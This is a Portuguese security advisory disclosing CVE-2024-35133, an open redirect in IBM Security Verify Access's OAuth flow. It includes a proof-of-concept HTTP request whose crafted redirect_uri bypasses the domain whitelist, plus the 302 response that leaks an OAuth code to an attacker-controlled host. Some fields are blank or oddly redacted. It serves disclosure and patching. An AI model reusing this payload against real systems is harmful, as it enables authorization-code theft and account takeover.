
Boletim de Segurança para CVE-2024-35133 - Com PoC
Revisão: 1.0
Impacto:
Ao persuadir uma vítima a visitar um site especialmente criado, um atacante remoto poderia explorar esta vulnerabilidade para falsificar a URL exibida e redirecionar o usuário para um site malicioso. Isso poderia permitir que o atacante obtivesse informações altamente sensíveis ou realizasse ataques adicionais contra a vítima.
Severidade:
Pontuação CVSS:
CVE-ID: CVE-2024-35133
Fornecedor: IBM
Produtos Afetados:
Versões Afetadas: 10.0.0 - 10.0.8
O IBM Security Verify Access é uma solução completa de gerenciamento de políticas de autorização e segurança de rede. Ele fornece proteção de ponta a ponta para recursos em intranets e extranets geograficamente dispersas.
Alguns recursos principais incluem:
Durante um teste de penetração do fluxo OAuth para um cliente, foi descoberta uma vulnerabilidade de Open Redirect, permitindo o vazamento da variável "code" do OAuth.
Ao contornar a lógica do parser responsável por verificar o parâmetro "redirect_uri" durante um fluxo OAuth (utilizando o RFC 3986), o atacante poderia manipular o filtro de whitelist de domínios no IBM Security Verify Access. Isso resultou em um redirecionamento aberto para qualquer domínio arbitrário controlado pelo atacante. A vítima poderia ser redirecionada para um site malicioso enquanto o domínio aparenta ser confiável.
Isso poderia levar à exposição de informações sensíveis, como o token "code" do OAuth, ou a ataques adicionais contra a vítima.
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
HTTP/1.1 302 Found
content-language: en-US
date: Tue, 19 Mar 2024 16:04:35 GMT
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-frame-options: DENY
x-content-type-options: nosniff
cache-control: no-store
x-xss-protection: 1; mode=block
x-permitted-cross-domain-policies: none
cross-origin-resource-policy: same-site
content-security-policy: frame-ancestors 'none'
referrer-policy: no-referrer-when-downgrade
strict-transport-security: max-age=31536000; includeSubDomains
pragma: no-cache
Content-Length: 0.
Consulte o IBM Security Bulletin 7166712 para obter informações sobre patch, atualização ou workaround sugerido.
Consulte Referências para mais detalhes.
Esta vulnerabilidade foi descoberta e reportada por:
Copyright (c) 2024 Giulio Garzia "Ozozuz"
É concedida permissão para redistribuição eletrônica deste alerta. Ele não pode ser editado sem consentimento explícito por escrito. Para obter permissão de reimpressão deste alerta em outros meios, entre em contato com o autor.
Aviso Legal: As informações neste advisory são precisas no momento da publicação com base nos dados disponíveis. Nenhuma garantia é fornecida. Nem o autor nem o editor aceitam responsabilidade por danos diretos, indiretos ou consequenciais decorrentes do uso destas informações.